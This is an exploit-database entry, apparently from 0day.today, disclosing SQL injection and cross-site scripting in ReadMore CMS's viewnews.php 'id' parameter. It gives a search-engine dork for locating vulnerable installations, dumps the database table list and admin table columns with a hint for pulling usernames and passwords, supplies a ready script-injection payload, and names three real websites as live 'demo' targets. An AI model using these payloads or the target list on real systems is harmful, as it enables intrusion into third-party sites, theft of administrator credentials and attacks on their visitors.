ReadMore CMS Multiple Vulnerability

2013-09-29T00:00:00
ID 1337DAY-ID-21292
Type zdt
Reporter Arsan
Modified 2013-09-29T00:00:00

Description

[Website Powered By ReadMore Systems, Incorporated] SQL Injection And XSS In (viewnews.php) Parameter "id"

                                        
                                            #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: ReadMore CMS Multiple Vulnerability
# Date: 2013 29 September
# Author: Arsan
# Vendor Homepage: http://readmoresystems.com
# Version : All Version
# Tested on: Linux & Windows
# Category: webapps
# Google Dork: inurl:"/viewnews.php?newsid=" , intext:"Powered By ReadMore Systems"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# 	[-] Description :
#	SQL Injection And XSS In (viewnews.php) Parameter "id" :
#	http://<server>/viewnews.php?newsid=1&id=1[SQL-Injection][XSS]
# 	[-] Description Exploit :
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[SQL Injection]
# (+) Tables Name:
# tb_b_windowtype
# tb_b_video
# tb_b_userresponse
# tb_b_templatelayout
# tb_b_task
# tb_b_systemsettings
# tb_b_submenu
# tb_b_sitehit
# tb_b_shop_subcategory
# tb_b_shop_category
# tb_b_shop
# tb_b_shippingrates
# tb_b_shippingmethod
# tb_b_searchhit
# tb_b_re_property
# tb_b_re_agent
# tb_b_propertytypes
# tb_b_propertystatus
# tb_b_propertyoption
# tb_b_profile
# tb_b_pollvote_iprecord
# tb_b_poll
# tb_b_payment
# tb_b_orders
# tb_b_orderdetails
# tb_b_newsrate
# tb_b_newsopinion
# tb_b_newsnewmember
# tb_b_newsmember
# tb_b_newsletter_category
# tb_b_newsletter
# tb_b_newscategory
# tb_b_news_welcome
# tb_b_news
# tb_b_menusettings
# tb_b_menuhit
# tb_b_menu
# tb_b_link_category
# tb_b_link
# tb_b_images
# tb_b_highlightbox_general_settings
# tb_b_highlightbox
# tb_b_helpimages
# tb_b_helpchapter
# tb_b_helpbrief
# tb_b_guestbook
# tb_b_event
# tb_b_emailsettings
# tb_b_customerad_random_instory_settings
# tb_b_customerad_random_instory
# tb_b_customerad
# tb_b_customer_category
# tb_b_customer
# tb_b_contents
# tb_b_comments
# tb_b_classicad
# tb_b_classic_profile
# tb_b_classic_category
# tb_b_classic
# tb_b_calendarsettings
# tb_b_boxes_popup
# tb_b_boxes
# tb_b_blog_category
# tb_b_blog
# tb_b_apages_custompg
# tb_b_advertisers_custompg
# tb_b_adminprofile
# tb_b_adminmenu
# tb_b_adhit_random_instory
# tb_b_adhit
# ----------
# (+) Admin Table (tb_b_adminprofile) Columns :
# mode
# txt_status
# accesslevel
# varContact
# varEmail
# varPassword
# varUser
# intAdminId
# ----------
# (+) User And Password In : varUser,0x3a,varPassword
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[XSS]
# Just Insert This Code After Url :
# "><script>alert(/Arsan/)</script>
# Example :
# http://www.valleycatholiconline.com/viewnews.php?newsid=1&id=1"><script>alert(/Arsan/)</script>
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Demo :
#
# cowracommunitynews.com/viewnews.php?newsid=2429&id=45[SQL-Injection][XSS]
# www.valleycatholiconline.com/viewnews.php?newsid=4364&id=10[SQL-Injection][XSS]
# www.nbnewsxpress.com/viewnews.php?newsid=9330&id=148[SQL-Injection][XSS]
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
#     [email protected]
#     Twitter.com/ArsanBlackhat
# 
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

#  0day.today [2018-04-03]  #